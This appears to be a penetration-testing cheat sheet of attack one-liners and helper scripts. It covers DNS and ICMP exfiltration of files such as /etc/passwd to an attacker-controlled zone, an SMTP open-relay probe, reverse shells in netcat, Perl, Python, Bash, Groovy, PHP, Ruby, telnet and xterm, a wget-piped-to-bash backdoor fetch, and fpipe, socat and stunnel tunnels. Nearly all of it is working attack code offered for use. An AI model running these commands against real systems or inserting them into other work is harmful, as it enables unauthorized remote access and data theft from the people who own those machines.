
Table Of Contents

  • Tips and Tricks
    • FTP Through Non-Interactive Windows Shell
    • DNS Transfer on Linux
    • Exfil Command Output on a Linux Machine Over ICMP
    • Sending Email From Open Relay (Telnet)
  • Reverse Shells
    • Netcat
    • Perl
    • Python
    • Bash
    • Java
    • PHP
    • Ruby
    • Telnet
    • XTerm
    • WGET Script Download & Execute
  • Tunneling
    • FPipe Tunnel
    • Socat Tunnel
    • SSL Encapsulated Netcat Tunnel (STunnel)

TIPS AND TRICKS

FTP THROUGH NON-INTERACTIVE WINDOWS SHELL

Build an ftp command script and feed it to ftp.exe. With -n auto-login is suppressed, so the username has to be sent with an explicit user command (the password goes on the following line):

echo open <IP_ADDRESS> 21 > ftp.txt
echo user <USERNAME> >> ftp.txt
echo <PASSWORD> >> ftp.txt
echo bin >> ftp.txt
echo get <FILE_PATH> >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

DNS TRANSFER ON LINUX

# [On victim] -- Hex encode the file to be transferred (xxd -p emits 60 hex
# characters per line, which fits the 63-character DNS label limit):
xxd -p secret > file.hex

# [On victim] -- Read in each line and do a DNS lookup for it under a zone
# the attacker controls or can sniff. Resolvers cache answers and `uniq`
# below collapses consecutive duplicates, so identical lines (e.g. runs of
# zero bytes) are lost unless every query name is made unique:
for b in `cat file.hex`; do dig $b.shell.evilexample.com; done

# [On attacker] -- Capture DNS exfil packets (system.example.com is the victim):
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com

# [On attacker] -- Cut the exfilled hex (the queried name) out of each packet:
tcpdump -r /tmp/dns -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt

# [On attacker] -- Reverse the hex encoding:
xxd -r -p < received.txt > secret
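The dig/xxd loop above loses data whenever a hex line repeats, and gives the receiver no way to tell a dropped query from a duplicated one. The script below is an added example, not code from the original page: it chunks a file into query names that carry a sequence number and an end marker, parses the names back out of `tcpdump -n` text output, and reassembles the file in order while tolerating retries and reporting missing chunks. The zone shell.evilexample.com is taken from the steps above; the sample data and the tcpdump lines in the main block are constructed, not captured.

```python
#!/usr/bin/env python3
"""Added example (not from the original page): DNS exfiltration chunker
and receiver-side reassembly with sequence numbers.

Assumption (hypothetical): the attacker controls or can sniff queries for
the zone shell.evilexample.com, as in the dig/tcpdump steps above."""
import binascii
import re

ZONE = "shell.evilexample.com"
# 28 bytes -> 56 hex chars; with "<seq>-" in front the label stays within
# the 63-character DNS label limit for up to 999999 chunks.
CHUNK = 28

# Shape of a query line in `tcpdump -n` text output,
# e.g. "... 4321+ [1au] A? 0-deadbeef.shell.evilexample.com. (58)".
QUERY_RE = re.compile(r" [A-Z]+\? (\S+?)\.? \(\d+\)")


def encode_queries(data: bytes, zone: str = ZONE, chunk: int = CHUNK) -> list:
    """Split data into query names "<seq>-<hex>.<zone>" plus an "end-<count>"
    trailer. The sequence number makes every name unique, so resolver caching
    and `uniq` cannot swallow repeated chunks, and it lets the receiver restore
    order and discard retransmitted queries."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk)):
        hexpart = binascii.hexlify(data[off:off + chunk]).decode("ascii")
        names.append(f"{seq}-{hexpart}.{zone}")
    names.append(f"end-{len(names)}.{zone}")
    return names


def names_from_tcpdump(lines) -> list:
    """Extract queried names from `tcpdump -r capture -n` text lines."""
    out = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            out.append(m.group(1))
    return out


def decode_queries(names, zone: str = ZONE) -> bytes:
    """Reassemble the file from query names in any order, tolerating duplicates
    (dig retries) and ignoring names outside the zone. Raises ValueError when
    chunks are missing instead of returning silently corrupted data."""
    suffix = "." + zone
    chunks = {}
    expected = None
    for name in names:
        name = name.rstrip(".")
        if not name.endswith(suffix):
            continue  # unrelated traffic
        tag, _, payload = name[:-len(suffix)].partition("-")
        if tag == "end" and payload.isdigit():
            expected = int(payload)
        elif tag.isdigit():
            try:
                chunks[int(tag)] = binascii.unhexlify(payload)
            except binascii.Error:
                continue  # damaged label; it will show up as missing
    if expected is None:
        raise ValueError("no end marker seen; capture is incomplete")
    missing = sorted(set(range(expected)) - set(chunks))
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return b"".join(chunks[i] for i in range(expected))


if __name__ == "__main__":
    # Constructed sample data, not a real file or capture.
    sample = b"root:x:0:0:root:/root:/bin/bash\n" * 4
    names = encode_queries(sample)
    for n in names:
        print(f"dig {n}")  # what the victim side would run
    lines = [f"12:00:00.000001 IP 10.0.0.5.51234 > 10.0.0.1.53: 1+ [1au] A? {n}. (70)"
             for n in names]
    assert decode_queries(names_from_tcpdump(lines)) == sample
```

On the victim the names printed by the main block are the arguments to dig; on the attacker, feed the output of `tcpdump -r /tmp/dns -n` to `names_from_tcpdump` and the result to `decode_queries`.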

EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER ICMP

# [On victim] -- Hex-encode the data with od (strip offsets, spaces and
# newlines), then send it 16 hex characters (8 bytes) per packet as the ICMP
# echo pattern; ping -p takes up to 16 pad bytes given in hex, and each ping
# is retried until it succeeds. The loop condition must be "<": with "<=" the
# last iteration passes an empty pattern to ping, which fails and never ends.
stringZ=`cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n"`; counter=0; while (($counter < ${#stringZ}));do ping -s 16 -c 1 -p ${stringZ:$counter:16} 192.168.10.10 && counter=$((counter+16));done

# [On attacker] -- Capture echo requests (icmp[0]=8) with a full hex dump to data.dmp:
tcpdump -ntvvSxs 0 'icmp[0]=8' > data.dmp

# [On attacker] -- Pull the pattern bytes out of the 0x0020 line of each dump
# and decode them. The column offset (-c21-) skips the IP header, the ICMP
# header and ping's 8-byte timestamp; it only holds for -s 16 and a ping build
# that stores an 8-byte timestamp, so check one packet by hand first.
grep 0x0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p

SENDING EMAIL FROM OPEN RELAY (TELNET)

Connect to the SMTP port by hand and type the dialogue below (server replies omitted). Headers come directly after DATA, an empty line separates them from the body, and a line containing only a dot ends the message. The server is an open relay if it answers 250 to a RCPT TO for a domain it does not host, from a sender it does not host; a 550/554 "relay access denied" reply means it is not.

telnet <IP_ADDRESS> 25
HELO <HOSTNAME>
MAIL FROM:<EMAIL_ADDRESS>
RCPT TO:<EMAIL_ADDRESS>
DATA
Subject: <SUBJECT>

Thank You.
.
quit
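The same exchange can be driven from a script and the verdict read off the reply codes. The following is an added example, not code from the original page: it speaks the banner/EHLO/MAIL FROM/RCPT TO/QUIT sequence, handles multi-line replies, and stops before DATA so no message is actually delivered. The host name probe.example.net, the sender and recipient addresses, and the two canned server transcripts are assumptions constructed for offline use, not captured from a real server.

```python
#!/usr/bin/env python3
"""Added example (not from the original page): run the SMTP dialogue above
from a script and decide from the reply codes whether the host relays mail
for domains it does not serve. It stops before DATA, so nothing is sent.

Assumptions (hypothetical): the sender and recipient are in domains the
target does not host; the canned replies below are constructed for offline
testing, not captured from a real server."""
import io
import socket
import sys


def read_reply(rfile):
    """Read one SMTP reply. Continuation lines look like '250-...'; the final
    line has a space after the code. Returns (code, lines)."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("latin-1").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return int(line[:3]), lines


def probe_relay(rfile, wfile, mail_from, rcpt_to, helo="probe.example.net"):
    """Banner, EHLO, MAIL FROM, RCPT TO, QUIT. Returns (relays, transcript).
    A 250/251 to RCPT TO for a foreign recipient means the server will relay;
    a 5xx (typically 550/554 'relay access denied') means it will not."""
    transcript = []

    def exchange(cmd):
        if cmd is not None:
            wfile.write(cmd.encode("ascii") + b"\r\n")
            wfile.flush()
            transcript.append("C: " + cmd)
        code, lines = read_reply(rfile)
        transcript.extend("S: " + l for l in lines)
        return code

    if exchange(None) != 220:
        raise RuntimeError("no SMTP banner: " + transcript[-1])
    if exchange(f"EHLO {helo}") != 250:
        raise RuntimeError("EHLO rejected: " + transcript[-1])
    if exchange(f"MAIL FROM:<{mail_from}>") != 250:
        raise RuntimeError("MAIL FROM rejected: " + transcript[-1])
    relays = exchange(f"RCPT TO:<{rcpt_to}>") in (250, 251)
    try:
        exchange("QUIT")
    except ConnectionError:
        pass  # some servers drop the line right after rejecting the recipient
    return relays, transcript


def probe_scripted(server_replies: bytes, mail_from, rcpt_to):
    """Run probe_relay against canned server output (offline check).
    Returns (relays, transcript, bytes_the_client_sent)."""
    rfile, wfile = io.BytesIO(server_replies), io.BytesIO()
    relays, transcript = probe_relay(rfile, wfile, mail_from, rcpt_to)
    return relays, transcript, wfile.getvalue()


# Constructed replies for the two outcomes (not from a real server).
OPEN_RELAY_REPLIES = (
    b"220 mail.example.com ESMTP\r\n"
    b"250-mail.example.com\r\n250-SIZE 10240000\r\n250 8BITMIME\r\n"
    b"250 2.1.0 Ok\r\n"
    b"250 2.1.5 Ok\r\n"
    b"221 2.0.0 Bye\r\n"
)
CLOSED_RELAY_REPLIES = OPEN_RELAY_REPLIES.replace(
    b"250 2.1.5 Ok\r\n",
    b"554 5.7.1 <probe@external.example>: Relay access denied\r\n",
)

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    with socket.create_connection((host, 25), timeout=10) as s:
        relays, transcript = probe_relay(
            s.makefile("rb"), s.makefile("wb"),
            "probe@attacker.example", "probe@external.example")
    print("\n".join(transcript))
    print("OPEN RELAY" if relays else "relay refused")
```

Run it as `python3 probe.py <IP_ADDRESS>`; the transcript shows both sides of the exchange and the last line gives the verdict. Because the probe never sends DATA, no mail is queued on the target.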

REVERSE SHELLS

NETCAT

Linux reverse shell

nc <IP_ADDRESS> <PORT> -e /bin/sh

Windows reverse shell

nc <IP_ADDRESS> <PORT> -e cmd.exe

Netcat work-around when the -e option is not available (e.g. OpenBSD netcat): a named pipe carries the shell's output back into the connection

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP_ADDRESS> <PORT> >/tmp/f

PERL

Perl

perl -e 'use Socket;$i="<IP_ADDRESS>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl without /bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP_ADDRESS>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Perl for Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"<IP_ADDRESS>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PYTHON

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP_ADDRESS>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

BASH

bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1

JAVA

This is Groovy syntax (untyped variables and the `as String[]` cast), so it runs wherever a Groovy script console is exposed on the JVM. It spawns bash, opens the connection on file descriptor 5 and executes each line read from it, sending output back over the same descriptor:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP_ADDRESS>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP

php -r '$sock=fsockopen("<IP_ADDRESS>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

RUBY

Ruby

ruby -rsocket -e'f=TCPSocket.open("<IP_ADDRESS>",<PORT>).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Ruby without /bin/sh

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<IP_ADDRESS>","<PORT>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Ruby for Windows

ruby -rsocket -e 'c=TCPSocket.new("<IP_ADDRESS>","<PORT>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TELNET

Needs two listeners on the attacker: commands are typed into the one on <PORT>, output arrives on the one on <PORT+1>

telnet <IP_ADDRESS> <PORT> | /bin/bash | telnet <IP_ADDRESS> <PORT+1>

XTERM

# [On attacker] -- Start a listener: an Xnest server on display :1 listens on TCP port 6001
# (if it refuses TCP connections, start it with -listen tcp)
Xnest :1

# [On attacker] -- Allow the victim's address to connect to that display
DISPLAY=:1 xhost +<VICTIM_IP>

# [On victim] -- Open an xterm on the attacker's display (:1 selects port 6001)
xterm -display <IP_ADDRESS>:1

WGET SCRIPT DOWNLOAD & EXECUTE

wget -O- http://<IP_ADDRESS>:<PORT>/backdoor.sh | bash

TUNNELING

FPIPE TUNNEL

Listen on port 1234 and forward to 2.2.2.2 on port 80

fpipe.exe -l 1234 -r 80 2.2.2.2

SOCAT TUNNEL

Listen on port 1234 and forward each incoming connection (fork handles them concurrently) to 2.2.2.2 on port 80

socat TCP-LISTEN:1234,fork TCP:2.2.2.2:80

SSL ENCAPSULATED NETCAT TUNNEL (STUNNEL)

# (Listening Server) -- Generate a self-signed certificate and key in one PEM file
# (the path must match the cert line of the configuration below; writing to /etc/stunnel needs root)
openssl req -new -x509 -days 365 -nodes -out /etc/stunnel/stunnel.pem -keyout /etc/stunnel/stunnel.pem

# (Listening Server) -- Write ./stunnel.conf: accept TLS on 4444 and pass the plaintext to the local netcat on 7777
client = no
[netcat server]
accept = 4444
connect = 7777
cert = /etc/stunnel/stunnel.pem

# (Listening Server) -- Run stunnel
sudo stunnel ./stunnel.conf

# (Attacker) -- Write ./stunnel.conf: accept plaintext on local 5555 and open a TLS connection to the server's 4444.
# As written this client does not verify the server certificate, so anyone who can intercept the
# connection can present their own certificate and read the session.
client = yes
[netcat client]
accept = 5555
connect = <LISTENING_IP>:4444

# (Attacker) -- Run stunnel
sudo stunnel ./stunnel.conf

# (Listening Server) -- Listen for netcat connection
nc -vlp 7777

# (Attacker) -- Connect into victim computer via netcat
nc -nv 127.0.0.1 5555
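The attacker-side configuration above accepts whatever certificate the listener presents, so the TLS wrapper only hides the session from passive sniffing. The following client configuration is an added example, not part of the original page: it pins the listener's self-signed certificate so that a connection terminated by anyone else is rejected. It assumes the certificate half of stunnel.pem has been copied to the attacker as /etc/stunnel/server-cert.pem (for instance with `openssl x509 -in stunnel.pem -out server-cert.pem` on the listening server; the private key stays there), and that stunnel is a 5.x release.

```ini
; Attacker-side stunnel.conf with peer verification (added example)
client = yes

[netcat client]
accept = 5555
connect = <LISTENING_IP>:4444
; Refuse the connection unless the presented certificate is the one in
; CAfile. The certificate is self-signed, so there is no chain to validate,
; only the peer itself. Older stunnel releases spell this "verify = 3".
verifyPeer = yes
CAfile = /etc/stunnel/server-cert.pem
```

With this in place the `nc -nv 127.0.0.1 5555` step fails instead of silently connecting when the far end is not the expected listener.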